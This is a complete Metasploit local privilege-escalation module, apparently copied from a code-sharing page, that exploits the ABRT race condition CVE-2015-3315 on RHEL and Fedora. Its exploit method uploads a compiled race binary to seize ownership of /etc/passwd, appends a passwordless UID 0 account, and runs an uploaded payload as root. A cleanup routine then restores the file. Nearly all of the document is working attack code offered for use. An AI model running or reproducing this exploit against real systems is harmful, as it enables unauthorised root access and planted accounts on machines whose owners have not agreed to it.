Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::FileDropper
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'ABRT raceabrt Privilege Escalation',
18
        'Description' => %q{
19
          This module attempts to gain root privileges on Linux systems with
20
          a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
21
          as the crash handler.
22

23
          A race condition allows local users to change ownership of arbitrary
24
          files (CVE-2015-3315). This module uses a symlink attack on
25
          `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
26
          then adds a new user with UID=0 GID=0 to gain root privileges.
27
          Winning the race could take a few minutes.
28

29
          This module has been tested successfully on:
30

31
          abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;
32
          abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;
33
          abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;
34
          abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;
35
          abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.
36
        },
37
        'License' => MSF_LICENSE,
38
        'Author' => [
39
          'Tavis Ormandy', # Discovery and C exploit
40
          'bcoles' # Metasploit
41
        ],
42
        'DisclosureDate' => '2015-04-14',
43
        'Platform' => [ 'linux' ],
44
        'Arch' => [ ARCH_X86, ARCH_X64 ],
45
        'SessionTypes' => [ 'shell', 'meterpreter' ],
46
        'Targets' => [[ 'Auto', {} ]],
47
        'References' => [
48
          [ 'CVE', '2015-3315' ],
49
          [ 'EDB', '36747' ],
50
          [ 'BID', '75117' ],
51
          [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],
52
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
53
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],
54
          [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],
55
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],
56
          [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],
57
          [ 'URL', 'https://access.redhat.com/articles/1415483' ],
58
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
59
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
60
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]
61
        ],
62
        'Compat' => {
63
          'Meterpreter' => {
64
            'Commands' => %w[
65
              stdapi_fs_stat
66
              stdapi_sys_process_execute
67
            ]
68
          }
69
        }
70
      )
71
    )
72
    register_options(
73
      [
74
        OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),
75
        OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ])
76
      ]
77
    )
78
    register_advanced_options [
79
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
80
    ]
81

82
    self.needs_cleanup = true
83
  end
84

85
  def base_dir
86
    datastore['WritableDir']
87
  end
88

89
  def timeout
90
    datastore['TIMEOUT']
91
  end
92

93
  def check
94
    if immutable?('/etc/passwd')
95
      vprint_error 'File /etc/passwd is immutable'
96
      return CheckCode::Safe
97
    end
98

99
    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
100
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
101
      vprint_error 'System is NOT configured to use ABRT for crash reporting'
102
      return CheckCode::Safe
103
    end
104
    vprint_good 'System is configured to use ABRT for crash reporting'
105

106
    if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'
107
      vprint_error "Directory '/var/spool/abrt' exists. System has been patched."
108
      return CheckCode::Safe
109
    end
110
    vprint_good 'System does not appear to have been patched'
111

112
    unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'
113
      vprint_error "Directory '/var/tmp/abrt' does NOT exist"
114
      return CheckCode::Safe
115
    end
116
    vprint_good "Directory '/var/tmp/abrt' exists"
117

118
    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
119
      vprint_error 'abrt-ccp service NOT running'
120
      return CheckCode::Safe
121
    end
122
    vprint_good 'abrt-ccpp service is running'
123

124
    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
125
    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
126
    unless abrt_version.blank?
127
      vprint_status "System is using ABRT package version #{abrt_version}"
128
    end
129

130
    CheckCode::Detected
131
  end
132

133
  def upload_and_chmodx(path, data)
134
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
135
    rm_f path
136
    write_file path, data
137
    cmd_exec "chmod +x '#{path}'"
138
    register_file_for_cleanup path
139
  end
140

141
  def exploit
142
    if check != CheckCode::Detected
143
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
144
    end
145

146
    @chown_file = '/etc/passwd'
147

148
    if datastore['USERNAME'].blank?
149
      @username = rand_text_alpha rand(7..10)
150
    else
151
      @username = datastore['USERNAME']
152
    end
153

154
    # Upload Tavis Ormandy's raceabrt exploit:
155
    # - https://www.exploit-db.com/exploits/36747/
156
    # Cross-compiled with:
157
    # - i486-linux-musl-cc -static raceabrt.c
158
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'
159
    fd = ::File.open path, 'rb'
160
    executable_data = fd.read fd.stat.size
161
    fd.close
162

163
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
164
    executable_path = "#{base_dir}/#{executable_name}"
165
    upload_and_chmodx executable_path, executable_data
166

167
    # Change working directory to base_dir
168
    cmd_exec "cd '#{base_dir}'"
169

170
    # Launch raceabrt executable
171
    print_status "Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ..."
172
    output = cmd_exec "#{executable_path} #{@chown_file}", nil, timeout
173
    output.each_line { |line| vprint_status line.chomp }
174

175
    # Check if we own /etc/passwd
176
    unless cmd_exec("[ -w #{@chown_file} ] && echo true").include? 'true'
177
      fail_with Failure::Unknown, "Failed to own '#{@chown_file}'"
178
    end
179

180
    print_good "Success! '#{@chown_file}' is writable"
181

182
    # Add new user with no password
183
    print_status "Adding #{@username} user to #{@chown_file} ..."
184
    cmd_exec "echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}"
185

186
    # Upload payload executable
187
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
188
    upload_and_chmodx payload_path, generate_payload_exe
189

190
    # Execute payload executable
191
    vprint_status 'Executing payload...'
192
    cmd_exec "/bin/bash -c \"echo #{payload_path} | su - #{@username}&\""
193
  end
194

195
  def on_new_session(session)
196
    if session.type.to_s.eql? 'meterpreter'
197
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
198
    end
199

200
    # Reinstate /etc/passwd root ownership and remove new user
201
    root_owns_passwd = false
202
    new_user_removed = false
203

204
    if session.type.to_s.eql? 'meterpreter'
205
      # Reinstate /etc/passwd root ownership
206
      session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
207

208
      # Remove new user
209
      session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
210

211
      # Wait for clean up
212
      Rex.sleep 5
213

214
      # Check root ownership
215
      passwd_stat = session.fs.file.stat(@chown_file).stathash
216
      if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
217
        root_owns_passwd = true
218
      end
219

220
      # Check for new user in /etc/passwd
221
      passwd_contents = session.fs.file.open(@chown_file).read.to_s
222
      unless passwd_contents.include? "#{@username}:"
223
        new_user_removed = true
224
      end
225
    elsif session.type.to_s.eql? 'shell'
226
      # Reinstate /etc/passwd root ownership
227
      session.shell_command_token "chown root:root #{@chown_file}"
228

229
      # Remove new user
230
      session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
231

232
      # Check root ownership
233
      passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
234
      if passwd_owner.to_s.include? 'root'
235
        root_owns_passwd = true
236
      end
237

238
      # Check for new user in /etc/passwd
239
      passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
240
      unless passwd_user.to_s.include? "#{@username}:"
241
        new_user_removed = true
242
      end
243
    end
244

245
    unless root_owns_passwd
246
      print_warning "Could not reinstate root ownership of #{@chown_file}"
247
    end
248

249
    unless new_user_removed
250
      print_warning "Could not remove user '#{@username}' from #{@chown_file}"
251
    end
252
  rescue => e
253
    print_error "Error during cleanup: #{e.message}"
254
  ensure
255
    super
256
  end
257
end
258

259